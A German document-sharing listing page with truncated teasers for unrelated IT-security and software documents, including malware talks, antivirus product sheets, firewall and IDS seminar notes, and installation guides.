Selbstüberprüfung und Verhalten im Verdachtsfall Viren, Trojaner, Rootkits und andere Schadsoftware Selbstüberprüfung und Verhalten im Verdachtsfall Viren, Trojaner, Rootkits und andere Schadsoftware Hessen IT Workshopreihe Wiesbaden, 23.10.2007 Christian Schülke Agenda Grundlagen Gefährdung/Bedrohung

Mehr

Brückenkurs / Computer

Brückenkurs / Computer Brückenkurs / Computer Sebastian Stabinger IIS 23 September 2013 Sebastian Stabinger (IIS) Brückenkurs / Computer 23 September 2013 1 / 20 Content 1 Allgemeines zum Studium 2 Was ist ein Computer? 3 Geschichte

Mehr

App-Entwicklung für Android

App-Entwicklung für Android App-Entwicklung für Android Einleitung - Systemarchitektur Hochschule Darmstadt WS15/16 1 Inhalt Historie Systemarchitektur Sandbox 2 Motivation Kontra Pro Limitierte Größe Begrenzte Ressourcen Kein Standardgerät

Mehr

IT-Sicherheit in Werbung und. von Bartosz Komander

IT-Sicherheit in Werbung und. von Bartosz Komander IT-Sicherheit in Werbung und Informatik von Bartosz Komander Gliederung Einführung Anti-viren-software Verschlüsselungssoftware Firewalls Mein Fazit Quellen 2 Einführung Was ist eigentlich IT-Sicherheit?

Mehr

Angriffsmethoden von Hackern. A. Verschiedene Angriffsmethoden

Angriffsmethoden von Hackern. A. Verschiedene Angriffsmethoden 1 Angriffsmethoden von Hackern A. Verschiedene Angriffsmethoden 1. IP-Spoofing IP-Spoofing bedeutet das Vortäuschen einer bestimmten IP-Adresse als Absender-Adresse. Er kann Access-Listen von Routern überlisten

Mehr

ENDPOINT SECURITY FOR MAC BY BITDEFENDER

ENDPOINT SECURITY FOR MAC BY BITDEFENDER ENDPOINT SECURITY FOR MAC BY BITDEFENDER Änderungsprotokoll Endpoint Security for Mac by Bitdefender Änderungsprotokoll Veröffentlicht 2015.03.11 Copyright 2015 Bitdefender Rechtlicher Hinweis Alle Rechte

Mehr

Im Original veränderbare Word-Dateien

Im Original veränderbare Word-Dateien Software Im Original veränderbare Word-Dateien Prinzipien der Datenverarbeitung Als Software bezeichnet man alle Programme, die in einer Computeranlage verwendet werden. Dabei unterscheiden wir zwischen

Mehr

Gerd Armbruster Gerd.Armbruster@GMX.De

Gerd Armbruster Gerd.Armbruster@GMX.De Viren, Trojaner & Hacker - so schützen Sie Ihren PC Gerd Armbruster Gerd.Armbruster@GMX.De 100 Mio Sony Kunden gehackt Aktuell Alles 2011 Immer noch 2011 Geschäftsmodell Agenda! Sicherheit im Internet!

Mehr

Viren und Co Seite 1 von 7. VIREN und Co

Viren und Co Seite 1 von 7. VIREN und Co Viren und Co Seite 1 von 7 VIREN und Co Vor kurzem hat der sogenannte "I Love You"-Virus zugeschlagen und weltweit Schäden in Miliardenhöhe angerichtet. Zwischenzeitlich machen auch verschiedenen Ableger

Mehr

Inhaltsverzeichnis Abbildungsverzeichnis

Inhaltsverzeichnis Abbildungsverzeichnis Inhaltsverzeichnis Abbildungsverzeichnis... 1 1 Eigener lokaler Webserver... 2 1.1 Download der Installationsdatei... 2 1.2 Installation auf externer Festplatte... 2 1.3 Dienste starten... 5 1.4 Webserver

Mehr

Der optimale Schutz für dynamische Unternehmens-Netzwerke

Der optimale Schutz für dynamische Unternehmens-Netzwerke Der optimale Schutz für dynamische Unternehmens-Netzwerke Kaspersky Open Space Security steht für den zuverlässigen Schutz von Firmen- Netzwerken, die immer mehr zu offenen Systemen mit ständig wechselnden

Mehr

Sniffer. Electronic Commerce und Digitale Unterschriften. Proseminar Leiter: Dr. Ulrich Tamm Vortragender: Stefan Raue Datum: 29.06.2004.

Sniffer. Electronic Commerce und Digitale Unterschriften. Proseminar Leiter: Dr. Ulrich Tamm Vortragender: Stefan Raue Datum: 29.06.2004. Sniffer Proseminar: Electronic Commerce und Digitale Unterschriften Proseminar Leiter: Dr. Ulrich Tamm Vortragender: Stefan Raue Datum: 29.06.2004 Gliederung Was sind Sniffer? Einführung Ethernet Grundlagen

Mehr

[Produktinformationen zu Kaspersky Anti-Virus Business-Optimal]

[Produktinformationen zu Kaspersky Anti-Virus Business-Optimal] IT-Services & Solutions Ing.-Büro WIUME [Produktinformationen zu Kaspersky Anti-Virus Business-Optimal] Produktinformationen zu Kaspersky Anti-Virus Business-Optimal by Ing.-Büro WIUME / Kaspersky Lab

Mehr

Aktuelle Sicherheitsprobleme im Internet

Aktuelle Sicherheitsprobleme im Internet Herbst 2014 Aktuelle Sicherheitsprobleme im Internet Wirtschaftsinformatik: 5. Semester Dozenten: Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW / Rainer Telesko - Martin Hüsler 1 Inhalt

Mehr

Definition (BSI) Intrusion Detection Systeme. Alternative Definition. Hauptkomponenten. Erkennung von Angriffen. Hauptkomponenten

Definition (BSI) Intrusion Detection Systeme. Alternative Definition. Hauptkomponenten. Erkennung von Angriffen. Hauptkomponenten Definition (BSI) Intrusion Detection Systeme IDS Aktive Überwachung von Systemen und Netzen mit dem Ziel der Erkennung von Angriffen und Missbrauch. Aus allen im Überwachungsbereich stattfindenen Ereignissen

Mehr

FAQ Häufig gestellte Fragen

FAQ Häufig gestellte Fragen FAQ Häufig gestellte Fragen FAQ zu HitmanPro.Kickstart Seite 1 Inhaltsverzeichnis Einführung in HitmanPro.Kickstart... 3 F-00: Wozu wird HitmanPro.Kickstart benötigt?... 4 F-01: Kann HitmanPro.Kickstart

Mehr

:: Anleitung Demo Benutzer 1cloud.ch ::

:: Anleitung Demo Benutzer 1cloud.ch :: :: one source ag :: Technopark Luzern :: D4 Platz 4 :: CH-6039 Root-Längenbold LU :: :: Fon +41 41 451 01 11 :: Fax +41 41 451 01 09 :: info@one-source.ch :: www.one-source.ch :: :: Anleitung Demo Benutzer

Mehr

Sophos Virenscanner Konfiguration

Sophos Virenscanner Konfiguration Ersteller/Editor Ulrike Hollermeier Änderungsdatum 12.05.2014 Erstellungsdatum 06.07.2012 Status Final Konfiguration Rechenzentrum Uni Regensburg H:\Sophos\Dokumentation\Sophos_Konfiguration.docx Uni Regensburg

Mehr

1 GRUNDBEGRIFFE ZU SICHERHEIT 7 1.1 Datenbedrohung... 7

1 GRUNDBEGRIFFE ZU SICHERHEIT 7 1.1 Datenbedrohung... 7 Der Aufbau dieser Lernunterlage ist der Gliederung des ECDL-Syllabus 5.0 angepasst. Kapitel und Unterkapitel sind daher in der gleichen Nummerierung, wie sie im ECDL-Core-Lernzielkatalog verwendet wird.

Mehr

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools jochen.schlichting@secorvo.de Seite 1 Inhalt Einführung: Typische Angriffe

Mehr

WINDOWS 7. Druckerkonfiguration - Systemsteuerung - Sicherheit

WINDOWS 7. Druckerkonfiguration - Systemsteuerung - Sicherheit WINDOWS 7 Druckerkonfiguration - Systemsteuerung - Sicherheit Druckerverwaltung ab Seite 91 = Standarddrucker Druckaufträge verwalten ab Seite 96 Systemsteuerung ab Seite 97 System Information über das

Mehr

E-Mail-Exploits und ihre Gefahren

E-Mail-Exploits und ihre Gefahren E-Mail-Exploits und ihre Gefahren Warum zum Erkennen von E-Mail-Exploits eine beson dere Engine benötigt wird In diesem White Paper erfahren Sie, worum es sich bei E-Mail-Exploits handelt und welche E-Mail-Exploits

Mehr

AV-TEST. Sicherheitslage Android

AV-TEST. Sicherheitslage Android AV-TEST Sicherheitslage Android Sicherheitslage Android 1 SICHERHEITSLAGE ANDROID MEHR ALS 30 IT-SPEZIALISTEN MEHR ALS 15 JAHRE EXPERTISE IM BEREICH ANTIVIREN-FORSCHUNG UNTERNEHMENSGRÜNDUNG 2004 EINE DER

Mehr

A9: Mobile Security - So werden Sie angegriffen! Renato Ettisberger renato.ettisberger@switch.ch

A9: Mobile Security - So werden Sie angegriffen! Renato Ettisberger renato.ettisberger@switch.ch A9: Mobile Security - So werden Sie angegriffen! Renato Ettisberger renato.ettisberger@switch.ch Zürich, 11. Oktober 2011 Security (SWITCH-CERT) Derzeit 7 Mitarbeiter, bald 10 Unser Team erbringt Security-Dienstleistungen

Mehr

Sinn und Unsinn von Desktop-Firewalls

Sinn und Unsinn von Desktop-Firewalls CLT 2005 Sinn und Unsinn von Desktop-Firewalls Wilhelm Dolle, Director Information Technology interactive Systems GmbH 5. und 6. März 2005 1 Agenda Was ist eine (Desktop-)Firewall? Netzwerk Grundlagen

Mehr

Microsoft Access 2010 Bilder

Microsoft Access 2010 Bilder Microsoft Access 2010 Bilder Hyperlinks... arbeiten ähnlich wie ein Link in einer Webseite. sind ein Verweis auf eine Datei (access2010\material\beispiel\tabledevelop\automat.accdb). können ein Verweis

Mehr

Live Hacking auf eine Citrix Umgebung

Live Hacking auf eine Citrix Umgebung Live Hacking auf eine Citrix Umgebung Ron Ott + Andreas Wisler Security-Consultants GO OUT Production GmbH www.gosecurity.ch GO OUT Production GmbH Gegründet 1999 9 Mitarbeiter Dienstleistungen: 1 Einleitung

Mehr

DriveLock 6. DriveLock und das Windows Sicherheitsproblem mit LNK Dateien. CenterTools Software GmbH

DriveLock 6. DriveLock und das Windows Sicherheitsproblem mit LNK Dateien. CenterTools Software GmbH 6 DriveLock und das Windows Sicherheitsproblem mit LNK Dateien CenterTools Software GmbH 2010 Copyright Die in diesen Unterlagen enthaltenen Angaben und Daten, einschließlich URLs und anderen Verweisen

Mehr

tzeforderung Installationsleitfaden Dieser Wegweiser führt Sie durch die Installation des Programms

tzeforderung Installationsleitfaden Dieser Wegweiser führt Sie durch die Installation des Programms tzeforderung Installationsleitfaden Dieser Wegweiser führt Sie durch die Installation des Programms EDV-Beratung Thomas Zecher 25.05.2013 1. Inhalt 2. Systemvoraussetzungen... 3 a).net Framework... 3 b)

Mehr

SANDBOX UND SYSTEMVIRTUALISIERUNG

SANDBOX UND SYSTEMVIRTUALISIERUNG SANDBOX UND SYSTEMVIRTUALISIERUNG MIT WINDOWS 7 64-BIT UND 10 SCHADPROGRAMMEN GETESTET 1. ALLGEMEINES Der Schutz des echten Systems wurde mit einem Sandbox-Programm und zwei Programmen zur Systemvirtualisierung

Mehr

Sun/Oracle Java Version: 1.6.0, neuer als 1.6.0_11

Sun/Oracle Java Version: 1.6.0, neuer als 1.6.0_11 Systemanforderungen für EnlightKS Online Certification Management Services ET2.13 Juni 2011 EnlightKS Candidate, EnlightKS TestStation Manager, EnlightKS Certification Manager Betriebssystem: Microsoft

Mehr

Der optimale Schutz für dynamische Unternehmens-Netzwerke

Der optimale Schutz für dynamische Unternehmens-Netzwerke Der optimale Schutz für dynamische Unternehmens-Netzwerke Kaspersky Open Space Security steht für den zuverlässigen Schutz von Firmen- Netzwerken, die immer mehr zu offenen Systemen mit ständig wechselnden

Mehr

Internet: Was ist das? - Routing

Internet: Was ist das? - Routing Internet: Was ist das? - Routing Auch Router Server Router Client ClientServer? Grundlagen Internet Sicherheit Angriffe Schutz Internet Map, The Opte Project Internet: Was ist das? - Netzwerk Peer-to-Peer

Mehr

LINUX Schulung. FrauenComputerZentrum Berlin. Jutta Horstmann, Mai 2006

LINUX Schulung. FrauenComputerZentrum Berlin. Jutta Horstmann, Mai 2006 LINUX Schulung FrauenComputerZentrum Berlin Jutta Horstmann, Mai 2006 Agenda Was ist Linux Was ist Open Source Warum Open Source Software Wie sieht Open Source Software aus Was kann man damit machen Ausprobieren!!

Mehr

Softwaresicherheit. Sicherheitsschwachstellen im größeren Kontext. Ulrich Bayer

Softwaresicherheit. Sicherheitsschwachstellen im größeren Kontext. Ulrich Bayer Softwaresicherheit Sicherheitsschwachstellen im größeren Kontext Ulrich Bayer Conect Informunity, 30.1.2013 2 Begriffe - Softwaresicherheit Agenda 1. Einführung Softwaresicherheit 1. Begrifflichkeiten

Mehr

GeoShop Netzwerkhandbuch

GeoShop Netzwerkhandbuch Technoparkstrasse 1 8005 Zürich Tel.: 044 / 350 10 10 Fax.: 044 / 350 10 19 GeoShop Netzwerkhandbuch Zusammenfassung Diese Dokumentation beschreibt die Einbindung des GeoShop in bestehende Netzwerkumgebungen.

Mehr

Sicherheit im Internet 1: Viren, Würmer und Trojaner. Viren, Würmer und Trojaner. Virenlawine. Weiterbildungsveranstaltung des PING e.v.

Sicherheit im Internet 1: Viren, Würmer und Trojaner. Viren, Würmer und Trojaner. Virenlawine. Weiterbildungsveranstaltung des PING e.v. Virenlawine Sicherheit im Internet 1: FAZ 2003-06-06 FAZ 2003-08-22 Weiterbildungsveranstaltung des PING e.v. Daniel Borgmann und Dr. med. Arthur Pranada FAZ 2004-06-04 FAZ 2004-06-05 Donnerstag, 24. November

Mehr

Installationsanleitung MS SQL Server 2005. für Sage 50 Ablage & Auftragsbearbeitung. Sage Schweiz AG D4 Platz 10 CH-6039 Root Längenbold

Installationsanleitung MS SQL Server 2005. für Sage 50 Ablage & Auftragsbearbeitung. Sage Schweiz AG D4 Platz 10 CH-6039 Root Längenbold Installationsanleitung MS SQL Server 2005 für Sage 50 Ablage & Auftragsbearbeitung Sage Schweiz AG D4 Platz 10 CH-6039 Root Längenbold Inhaltsverzeichnis 1. GRUNDSÄTZLICHES... 3 2. SQLExpress Installationsanleitung

Mehr

Byte-Taxi. Bedienungsanleitung. Seite 1 von 8

Byte-Taxi. Bedienungsanleitung. Seite 1 von 8 Byte-Taxi Bedienungsanleitung Seite 1 von 8 Inhaltsverzeichnis 1. Beschreibung 3 2. Systemvoraussetzungen 4 3. Installationsanleitung 5 4. Bedienung 6 5. Infos & Kontakt 8 Seite 2 von 8 1. Beschreibung

Mehr

Wie funktioniert die Festplattenverschlüsselung? Sicherheits- und IT-Administratoren

Wie funktioniert die Festplattenverschlüsselung? Sicherheits- und IT-Administratoren WHITE PAPER: WIE FUNKTIONIERT DIE FESTPLATTENVERSCHLÜSSELUNG?........................................ Wie funktioniert die Festplattenverschlüsselung? Who should read this paper Sicherheits- und IT-Administratoren

Mehr

Malware. Von Viren, Würmern, Hackern und Trojanern und wie man sich vor ihnen schützt. von Eugene Kaspersky. 1. Auflage. Hanser München 2008

Malware. Von Viren, Würmern, Hackern und Trojanern und wie man sich vor ihnen schützt. von Eugene Kaspersky. 1. Auflage. Hanser München 2008 Malware Von Viren, Würmern, Hackern und Trojanern und wie man sich vor ihnen schützt von Eugene Kaspersky 1. Auflage Hanser München 2008 Verlag C.H. Beck im Internet: www.beck.de ISBN 978 3 446 41500 3

Mehr

Anti-Viren-Software als integraler Bestandteil einer IT-Security-Strategie

Anti-Viren-Software als integraler Bestandteil einer IT-Security-Strategie Anti-Viren-Software als integraler Bestandteil einer IT-Security-Strategie Warum man trotzdem nicht vor Würmern sicher ist Folie Nr. 1 Marc Schneider Vorstellung Bei AV-Test.de für Server- und Groupware-Tests

Mehr

Avira Professional / Server Security. Date

Avira Professional / Server Security. Date Date Agenda Wozu benötige ich einen Virenschutz für Workstations/Server? Systemanforderungen der Avira Professional Security Was bietet die Avira Professional Security? Systemanforderungen der Avira Professional

Mehr

Dynamische Web-Anwendung

Dynamische Web-Anwendung Dynamische Web-Anwendung Christiane Lacmago Seminar Betriebssysteme und Sicherheit Universität Dortmund WS 02/03 Gliederung Einleitung Definition und Erläuterung Probleme der Sicherheit Ziele des Computersysteme

Mehr

Fachreferat. EFI -BIOS Nachfolger-

Fachreferat. EFI -BIOS Nachfolger- Fachreferat EFI -BIOS Nachfolger- Kurzerläuterung Übersicht EFI - Geschichte Aufbau und Vorteile Grafische Veranschaulichung Was passiert beim direkten einschalten eines Computers? Wie kommt die Intelligenz

Mehr

Trojaner, Viren, Würmer Ausbreitungswege und Bekämpfung

Trojaner, Viren, Würmer Ausbreitungswege und Bekämpfung Trojaner, Viren, Würmer Ausbreitungswege und Bekämpfung Christian Steiner sichstei@stud.uni-erlangen.de 01.07.2002 Abstract Vor allem für Windows und DOS-Systeme, aber im zunehmenden Maße auch für Linux

Mehr

G Data Whitepaper. Behaviour Blocking. Geschützt. Geschützter. G Data. Marco Lauerwald Marketing

G Data Whitepaper. Behaviour Blocking. Geschützt. Geschützter. G Data. Marco Lauerwald Marketing G Data Whitepaper Behaviour Blocking Marco Lauerwald Marketing Geschützt. Geschützter. G Data. Inhalt 1 Behaviour Blocking Mission: Unbekannte Bedrohungen bekämpfen... 2 1.1 Unbekannte Schädlinge: Die

Mehr

KAV/KIS 2014 Global Messaging- Leitfaden

KAV/KIS 2014 Global Messaging- Leitfaden KAV/KIS 2014 Global Messaging- Leitfaden Headlines Kaspersky Internet Security 2014 Kaspersky Anti-Virus 2014 Premium-Schutz für den PC Essenzieller PC-Schutz Produktbeschreibung 15/25/50 Kaspersky Internet

Mehr

Wozu sind Firewalls und VPN gut?

Wozu sind Firewalls und VPN gut? Wozu sind Firewalls und VPN gut? Wo wir hin wollen Einführung Was sind und wie funktionieren IP, TCP und UDP? Wie passt eine Firewall in dieses Bild? VPN, Verschlüsselung und ihre Auswirkungen Aktuelle

Mehr

Sophos Anti-Virus. Felizitas Heinebrodt. Technische Hochschule Nürnberg Rechenzentrum Kesslerplatz 12, 90489 Nürnberg. Version 12 September 2014

Sophos Anti-Virus. Felizitas Heinebrodt. Technische Hochschule Nürnberg Rechenzentrum Kesslerplatz 12, 90489 Nürnberg. Version 12 September 2014 Sophos Anti-Virus Felizitas Heinebrodt Technische Hochschule Nürnberg Rechenzentrum Kesslerplatz 12, 90489 Nürnberg Version 12 September 2014 DokID: sophos Vers. 12, 20.08.2015, RZ/THN Informationen des

Mehr

In 15 einfachen Schritten zum mobilen PC mit Paragon Drive Copy 10 und Microsoft Windows Virtual PC

In 15 einfachen Schritten zum mobilen PC mit Paragon Drive Copy 10 und Microsoft Windows Virtual PC PARAGON Technologie GmbH, Systemprogrammierung Heinrich-von-Stephan-Str. 5c 79100 Freiburg, Germany Tel. +49 (0) 761 59018201 Fax +49 (0) 761 59018130 Internet www.paragon-software.com Email sales@paragon-software.com

Mehr

So"ware Voraussetzungen und Spezifika5on für Eurotalk SCORM E Learning Inhalte. Version 1.0.64

Soware Voraussetzungen und Spezifika5on für Eurotalk SCORM E Learning Inhalte. Version 1.0.64 So"ware Voraussetzungen und Spezifika5on für Eurotalk SCORM E Learning Inhalte Version 1.0.64 Eurotalk Ltd. 2011 Inhaltsübersicht 1. Einführung 3 1.1 Produktbeschreibungen 3 1.2 Was ist SCORM? 3 1.3 Einsatzumgebungen

Mehr

Virtualisierung auf Mac OS X. Mar3n Bokämper Max Riegel 30. November 2008

Virtualisierung auf Mac OS X. Mar3n Bokämper Max Riegel 30. November 2008 Virtualisierung auf Mac OS X Mar3n Bokämper Max Riegel 30. November 2008 Inhalt Virtualisierung Konfigura3on eines virtuellen Rechners Virtualisierungslösungen für OS X Apple Boot Camp, keine Virtualisierungslösung!

Mehr

Zeiterfassung-Konnektor Handbuch

Zeiterfassung-Konnektor Handbuch Zeiterfassung-Konnektor Handbuch Inhalt In diesem Handbuch werden Sie den Konnektor kennen sowie verstehen lernen. Es wird beschrieben wie Sie den Konnektor einstellen und wie das System funktioniert,

Mehr

Der aktuelle Fall DNSChanger was Computernutzer jetzt tun können

Der aktuelle Fall DNSChanger was Computernutzer jetzt tun können Der aktuelle Fall DNSChanger was Computernutzer jetzt tun können Inhalt Was bisher geschah 2 Was passiert am 8. März 2012? 2 Wie teste ich meine Interneteinstellungen? 3 Auf dem PC 3 Auf dem Router 5 Allgemeine

Mehr

ZMI Benutzerhandbuch Sophos. Sophos Virenscanner Benutzerhandbuch

ZMI Benutzerhandbuch Sophos. Sophos Virenscanner Benutzerhandbuch ZMI Benutzerhandbuch Sophos Sophos Virenscanner Benutzerhandbuch Version: 1.0 12.07.2007 Herausgeber Zentrum für Medien und IT ANSCHRIFT: HAUS-/ZUSTELLADRESSE: TELEFON: E-MAIL-ADRESSE: Zentrum für Medien

Mehr

Systemempfehlungen. Sage HWP / Primus SQL 25.11.2013. Robert Gabriel ROCONGRUPPE

Systemempfehlungen. Sage HWP / Primus SQL 25.11.2013. Robert Gabriel ROCONGRUPPE 25.11.2013 Systemempfehlungen Sage HWP / Primus SQL Robert Gabriel ROCONGRUPPE Inhalt Einzelplatzrechner:... 2 Thema SQL Server... 2 Thema Microsoft Office... 3 Server/Netzwerke... 3 Hinweis SBS Server

Mehr

Viren, Würmer und Trojaner Über die Unterscheidung und Bekämpfung von Viren, Würmern und Trojanern

Viren, Würmer und Trojaner Über die Unterscheidung und Bekämpfung von Viren, Würmern und Trojanern Viren, Würmer und Trojaner Über die Unterscheidung und Bekämpfung von Viren, Würmern und Trojanern Jan Manuel Tosses Datum Zusammenfassung Viren, Würmer und Trojaner stellen nach jüngsten Umfragen den

Mehr

5.2 Analyse des File Slack

5.2 Analyse des File Slack 5.2 Analyse des File Slack 109 Es gibt an vielen Stellen eines Betriebssystems Fundorte für Gebrauchsspuren oder Hinweise auf Auffälligkeiten. Diese Stellen sollten grundsätzlich aufgesucht und analysiert

Mehr

Infektionsmechanismen von Viren und Würmern...

Infektionsmechanismen von Viren und Würmern... Infektionsmechanismen von Viren und Würmern...... und was man dagegen tun kann Ralf Benzmüller G DATA Software AG Überblick Definitionen Infektionsmechanismen Viren Anwendungen Würmer Surfen im WWW Online-Banking

Mehr

Verteilte Dateisysteme

Verteilte Dateisysteme Verteilte Dateisysteme Proseminar: Speicher und Dateisysteme Hauke Holstein Gliederung 1/23 - Einleitung - NFS - AFS - SMB Einleitung Was sind Verteilte Dateisysteme? 2/23 - Zugriff über ein Netzwerk -

Mehr

Sicherheit im Internet Empfehlungen für den Aufbau von sicheren E-Commerce Systemen

Sicherheit im Internet Empfehlungen für den Aufbau von sicheren E-Commerce Systemen Sicherheit im Internet Empfehlungen für den Aufbau von sicheren E-Commerce Systemen Prof. Dr. Bernhard Stütz Leiter Real-World-Labs an der Fachhochschule Stralsund Prof. Dr. Bernhard Stütz Security 1 Übersicht

Mehr